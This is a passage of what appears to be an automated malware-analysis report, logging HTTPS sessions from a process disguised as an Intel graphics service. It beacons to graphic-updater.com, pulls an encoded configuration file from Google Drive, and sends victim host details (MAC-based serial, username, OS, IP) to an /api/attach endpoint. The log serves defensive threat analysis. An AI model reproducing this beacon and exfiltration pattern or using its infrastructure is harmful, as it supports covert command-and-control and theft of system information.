                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:26 UTC | 30 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:26 UTC | 30 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 22
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:26 UTC | 31 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 42 | Source: 192.168.2.4:49839 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:27 UTC | 31 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:27 UTC | 31 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:27 UTC | 31 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 21
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:27 UTC | 31 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 43 | Source: 192.168.2.4:49843 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:27 UTC | 31 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:27 UTC | 31 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:28 UTC | 32 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 20
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:28 UTC | 32 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 44 | Source: 192.168.2.4:49842 | Destination: 142.250.181.238:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:27 UTC | 31 | OUT | GET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: drive.google.com
                                        2022-01-11 16:09:28 UTC | 32 | IN | HTTP/1.1 302 Moved Temporarily
                                        Content-Type: text/html; charset=UTF-8
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 11 Jan 2022 16:09:28 GMT
                                        Location: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Content-Security-Policy: script-src 'nonce-w9fYkMxXm2PUjN0srnboCA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                        Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        X-XSS-Protection: 1; mode=block
                                        Server: GSE
                                        Set-Cookie: NID=511=c-GfjKO3OhkhEbdJgOPW-ub9e_qRYk_UnfSrRDgyWQsXZ5ii5xw3GHsDrKMO0JVhj72P0Rze_hYcZTe5oLS7UB9J1DsTszM88KBLtYCZF07_0mIp5wUbqjOYYwyGEtu7cU1xBIkHAcXpyEyNaVoUWlpDCz8YkYfyAN7irxXYih0; expires=Wed, 13-Jul-2022 16:09:28 GMT; path=/; domain=.google.com; HttpOnly
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Accept-Ranges: none
                                        Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2022-01-11 16:09:28 UTC | 34 | IN | Data Raw: 31 37 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6b 2d 32 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6f 74 33 33
                                        Data Ascii: 179<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot33
                                        2022-01-11 16:09:28 UTC34INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 49846 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:28 UTC | 34 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:28 UTC | 34 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:28 UTC | 34 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:28 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 19
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:28 UTC | 35 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 49847 | Destination IP: 142.250.185.129 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:28 UTC | 34 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: doc-0k-2o-docs.googleusercontent.com
                                        2022-01-11 16:09:28 UTC | 35 | IN | HTTP/1.1 200 OK
                                        X-GUploader-UploadID: ADPycdtMVQJ0hG4LLqRwFlsgQl6l3sbmKOjS2U7il6t2dmStf3za2cejsss5KIeeuEtZob-uwZ-Pk-B2mK7lvhybDBI
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                        Access-Control-Allow-Methods: GET,OPTIONS
                                        Content-Type: text/plain
                                        Content-Disposition: attachment;filename="domain.txt";filename*=UTF-8''domain.txt
                                        Content-Length: 56
                                        Date: Tue, 11 Jan 2022 16:09:28 GMT
                                        Expires: Tue, 11 Jan 2022 16:09:28 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=zkaohA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Connection: close
                                        2022-01-11 16:09:28 UTC | 38 | IN | Data Raw: 4e 6d 73 6a 43 53 41 67 57 53 6c 68 61 56 4d 76 4a 7a 30 53 51 48 35 2b 61 69 55 7a 4d 43 55 70 4b 46 64 71 4f 7a 45 67 49 6a 59 4d 49 32 55 68 43 44 78 6d 46 67 3d 3d
                                        Data Ascii: NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==


                                        Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 49849 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:29 UTC | 38 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:29 UTC | 39 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:29 UTC | 39 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 18
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:29 UTC | 39 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 49850 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:29 UTC | 39 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:29 UTC | 39 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:29 UTC | 39 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 17
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:29 UTC | 39 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 49 | Source IP: 192.168.2.4 | Source Port: 49854 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:29 UTC | 39 | OUT | POST /api/attach HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 136
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:29 UTC | 40 | OUT | Data Raw: 73 65 72 69 61 6c 3d 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 5f 5f 6a 6f 6e 65 73 26 6e 61 6d 65 3d 6a 6f 6e 65 73 26 75 73 65 72 5f 74 6f 6b 65 6e 3d 38 37 32 33 34 37 38 38 37 33 34 38 37 26 6f 73 3d 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 36 34 2d 62 69 74 20 31 30 2e 30 2e 31 37 31 33 34 26 61 6e 74 69 3d 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 2e 34
                                        Data Ascii: serial=EC-F4-BB-EA-15-88__user&name=user&user_token=8723478873487&os= Microsoft Windows 10 Pro 64-bit 10.0.17134&anti=&ip=192.168.2.4
                                        2022-01-11 16:09:30 UTC | 40 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 16
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 48
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:30 UTC | 40 | IN | Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34 22 7d
                                        Data Ascii: {"token":"dda3e326-462d-4082-a6bd-07c7f1afd764"}


                                        Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49798 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:06 UTC | 7 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:06 UTC | 7 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:06 UTC | 8 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:06 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 56
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:06 UTC | 8 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 49856 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:30 UTC | 40 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:30 UTC | 40 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:30 UTC | 40 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 15
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:30 UTC | 41 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 49857 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:30 UTC | 40 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:30 UTC | 40 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:30 UTC | 41 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 14
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:30 UTC | 41 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 52 | Source IP: 192.168.2.4 | Source Port: 49861 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:30 UTC | 41 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:30 UTC | 41 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:31 UTC | 42 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 13
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:31 UTC | 42 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 53 | Source IP: 192.168.2.4 | Source Port: 49863 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:31 UTC | 41 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:31 UTC | 41 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:31 UTC | 42 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 12
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:31 UTC | 42 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 54 | Source IP: 192.168.2.4 | Source Port: 49864 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:31 UTC | 41 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:31 UTC | 42 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:31 UTC | 42 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 11
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:31 UTC | 43 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49799 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:07 UTC | 8 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:07 UTC | 8 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:07 UTC | 8 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:07 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 55
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:07 UTC | 8 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49800 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:08 UTC | 8 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
